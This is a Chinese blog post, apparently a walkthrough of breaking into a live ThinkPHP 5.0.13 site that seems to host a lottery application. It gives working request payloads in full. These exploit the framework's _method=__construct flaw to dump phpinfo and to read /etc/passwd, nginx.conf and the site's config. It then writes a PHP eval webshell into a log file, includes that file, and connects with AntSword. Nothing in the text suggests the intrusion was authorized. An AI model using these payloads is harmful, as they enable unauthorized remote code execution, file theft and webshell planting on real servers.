zoukankan      html  css  js  c++  java
  • 一次曲折的TP

    还是老规矩,进来直接用exp将phpinfo打出来(tp的版本为5.0.13)

     但是我们用常规的日志包含,却找不到我们的日志在哪里.后面才知道,我们get去请求也是无法请求到的,因为日志不在网站的绝对路径,只能通过post去fuzzing日志

     此时用session去包含,不行,因为session过期过的很快,所以一直拿不下来,后面问了公司的表哥才知道,这种情况可以用session的文件竞争来绕过,将其拿下。

    其他常规的exp,file_put_content  wget这些,都是打不进去的,这个时候我们就可以看看常规的文件能不能读取
    _method=__construct&method=get&filter[]=highlight_file&method=GET&get[]=/etc/pass

     然后我想的就是用payload罗列出目录,查找我们的日志在哪儿,但是当我想要罗列的时候,我觉得应该是运维设置盘符设置的有问题吧,全tm是null,就只有一个一个fuzzing

     根据其爆的phpinfo的信息,还有tp手册写的日志,我们成功fuzzing到一个比较重要的目录,就是日志的目录,此外,该站的话,没有登录是无法访问日志信息的

    我们可以通过都这里,然后在配合其debug信息,成功找到日志的位置,对了,再给表哥们补充几个tp其他敏感位置的文件
    _method=__construct&method=get&filter[]=think\_include_file&server[]=phpinfo&get[]=/etc/passwd
    _method=__construct&method=get&filter[]=show_source&method=GET&get[]=/etc/nginx/nginx.conf
    _method=__construct&filter[]=highlight_file&method=GET&get[]=/data/app/lottery/application/config/site.php
    最后,我们通过Post传参成功的读取到了日志,但是我们get的话,确是非授权的。

     

    先用exp报错,我们把一句话写进去,然后再用exp去看看我们写进去没有。
    _method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>
    _method=__construct&method=get&filter[]=think\__include_file&get[]=/data/appdata/lottery/log/agentapi/202012/30.log&x=phpinfo();

     成功包含,直接蚁剑链接拿下

  • 相关阅读:
    1351. 统计有序矩阵中的负数
    剑指 Offer 56
    39. 组合总和
    1619. 删除某些元素后的数组均值
    1380. 矩阵中的幸运数
    216. 组合总和 III
    面试题 08.03. 魔术索引
    1518. 换酒问题
    Xcode多进程调试:WKWebView
    Xcode编译WebKit
  • 原文地址:https://www.cnblogs.com/xinxin999/p/14220165.html
Copyright © 2011-2022 走看看